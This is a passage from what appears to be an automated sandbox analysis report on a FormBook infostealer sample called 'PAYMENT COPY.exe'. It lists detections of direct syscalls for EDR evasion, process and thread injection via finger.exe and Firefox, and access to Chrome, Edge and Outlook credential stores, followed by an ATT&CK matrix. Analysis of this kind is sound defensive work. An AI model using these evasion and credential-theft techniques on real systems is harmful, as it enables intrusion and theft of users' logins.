                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0A5B mov eax, dword ptr fs:[00000030h]1_2_00FE0A5B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6A50 mov eax, dword ptr fs:[00000030h]1_2_00FD6A50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084BB0 mov eax, dword ptr fs:[00000030h]1_2_01084BB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084BB0 mov eax, dword ptr fs:[00000030h]1_2_01084BB0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF4A35 mov eax, dword ptr fs:[00000030h]1_2_00FF4A35
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF4A35 mov eax, dword ptr fs:[00000030h]1_2_00FF4A35
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFEA2E mov eax, dword ptr fs:[00000030h]1_2_00FFEA2E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107EBD0 mov eax, dword ptr fs:[00000030h]1_2_0107EBD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105CBF0 mov eax, dword ptr fs:[00000030h]1_2_0105CBF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_00FD8BF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105CA11 mov eax, dword ptr fs:[00000030h]1_2_0105CA11
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA24 mov eax, dword ptr fs:[00000030h]1_2_0100CA24
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0BCD mov eax, dword ptr fs:[00000030h]1_2_00FD0BCD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA38 mov eax, dword ptr fs:[00000030h]1_2_0100CA38
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0BBE mov eax, dword ptr fs:[00000030h]1_2_00FE0BBE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0BBE mov eax, dword ptr fs:[00000030h]1_2_00FE0BBE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107EA60 mov eax, dword ptr fs:[00000030h]1_2_0107EA60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]1_2_0100CA6F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]1_2_0100CA6F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CA6F mov eax, dword ptr fs:[00000030h]1_2_0100CA6F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104CA72 mov eax, dword ptr fs:[00000030h]1_2_0104CA72
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104CA72 mov eax, dword ptr fs:[00000030h]1_2_0104CA72
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCCB7E mov eax, dword ptr fs:[00000030h]1_2_00FCCB7E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4A80 mov eax, dword ptr fs:[00000030h]1_2_010A4A80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008A90 mov edx, dword ptr fs:[00000030h]1_2_01008A90
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]1_2_01026ACC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]1_2_01026ACC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]1_2_01026ACC
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01004AD0 mov eax, dword ptr fs:[00000030h]1_2_01004AD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01004AD0 mov eax, dword ptr fs:[00000030h]1_2_01004AD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFEB20 mov eax, dword ptr fs:[00000030h]1_2_00FFEB20
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFEB20 mov eax, dword ptr fs:[00000030h]1_2_00FFEB20
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100AAEE mov eax, dword ptr fs:[00000030h]1_2_0100AAEE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100AAEE mov eax, dword ptr fs:[00000030h]1_2_0100AAEE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01088D10 mov eax, dword ptr fs:[00000030h]1_2_01088D10
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01088D10 mov eax, dword ptr fs:[00000030h]1_2_01088D10
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01004D1D mov eax, dword ptr fs:[00000030h]1_2_01004D1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01058D20 mov eax, dword ptr fs:[00000030h]1_2_01058D20
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCCCC8 mov eax, dword ptr fs:[00000030h]1_2_00FCCCC8
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]1_2_00FF8CB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]1_2_00FF8CB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01068D6B mov eax, dword ptr fs:[00000030h]1_2_01068D6B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8C8D mov eax, dword ptr fs:[00000030h]1_2_00FC8C8D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01006DA0 mov eax, dword ptr fs:[00000030h]1_2_01006DA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098DAE mov eax, dword ptr fs:[00000030h]1_2_01098DAE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098DAE mov eax, dword ptr fs:[00000030h]1_2_01098DAE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4DAD mov eax, dword ptr fs:[00000030h]1_2_010A4DAD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]1_2_00FDAC50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]1_2_00FD6C50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]1_2_00FD6C50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]1_2_00FD6C50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CDB1 mov ecx, dword ptr fs:[00000030h]1_2_0100CDB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CDB1 mov eax, dword ptr fs:[00000030h]1_2_0100CDB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CDB1 mov eax, dword ptr fs:[00000030h]1_2_0100CDB1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054DD7 mov eax, dword ptr fs:[00000030h]1_2_01054DD7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054DD7 mov eax, dword ptr fs:[00000030h]1_2_01054DD7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCEC20 mov eax, dword ptr fs:[00000030h]1_2_00FCEC20
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01070DF0 mov eax, dword ptr fs:[00000030h]1_2_01070DF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01070DF0 mov eax, dword ptr fs:[00000030h]1_2_01070DF0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]1_2_00FE0C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]1_2_00FE0C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]1_2_00FE0C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]1_2_00FE0C00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100CC00 mov eax, dword ptr fs:[00000030h]1_2_0100CC00
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC6DF6 mov eax, dword ptr fs:[00000030h]1_2_00FC6DF6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01054C0F mov eax, dword ptr fs:[00000030h]1_2_01054C0F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtSetInformationThread: Direct from: 0x77D263F9Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQueryInformationToken: Direct from: 0x77D32CACJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtCreateFile: Direct from: 0x77D32FECJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtOpenFile: Direct from: 0x77D32DCCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtSetInformationProcess: Direct from: 0x77D32C5CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtProtectVirtualMemory: Direct from: 0x77D32F9CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtOpenKeyEx: Direct from: 0x77D32B9CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtResumeThread: Direct from: 0x77D336ACJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtMapViewOfSection: Direct from: 0x77D32D1CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtWriteVirtualMemory: Direct from: 0x77D32E3CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtCreateMutant: Direct from: 0x77D335CCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtNotifyChangeKey: Direct from: 0x77D33C2CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQuerySystemInformation: Direct from: 0x77D32DFCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtReadFile: Direct from: 0x77D32ADCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtAllocateVirtualMemory: Direct from: 0x77D32BFCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtCreateUserProcess: Direct from: 0x77D3371CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQueryInformationProcess: Direct from: 0x77D32C26Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtResumeThread: Direct from: 0x77D32FBCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtDelayExecution: Direct from: 0x77D32DDCJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQueryAttributesFile: Direct from: 0x77D32E6CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtSetInformationThread: Direct from: 0x77D32B4CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtReadVirtualMemory: Direct from: 0x77D32E8CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtCreateKey: Direct from: 0x77D32C6CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtClose: Direct from: 0x77D32B6C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtAllocateVirtualMemory: Direct from: 0x77D33C9CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtWriteVirtualMemory: Direct from: 0x77D3490CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtOpenSection: Direct from: 0x77D32E0CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQueryVolumeInformationFile: Direct from: 0x77D32F2CJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtTerminateThread: Direct from: 0x77D27B2EJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtAllocateVirtualMemory: Direct from: 0x77D348ECJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtAllocateVirtualMemory: Direct from: 0x77D32BECJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtDeviceIoControlFile: Direct from: 0x77D32AECJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeNtQuerySystemInformation: Direct from: 0x77D348CCJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory written: C:\Users\user\AppData\Roaming\HashSize.exe base: 500000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 6768Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"Jump to behavior
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Users\user\Desktop\PAYMENT COPY.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Users\user\AppData\Roaming\HashSize.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts1
                      Scheduled Task/Job                      		111
                      Scripting                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		3
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		LSASS Memory113
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		412
                      Process Injection                      		1
                      Abuse Elevation Control Mechanism                      		Security Account Manager321
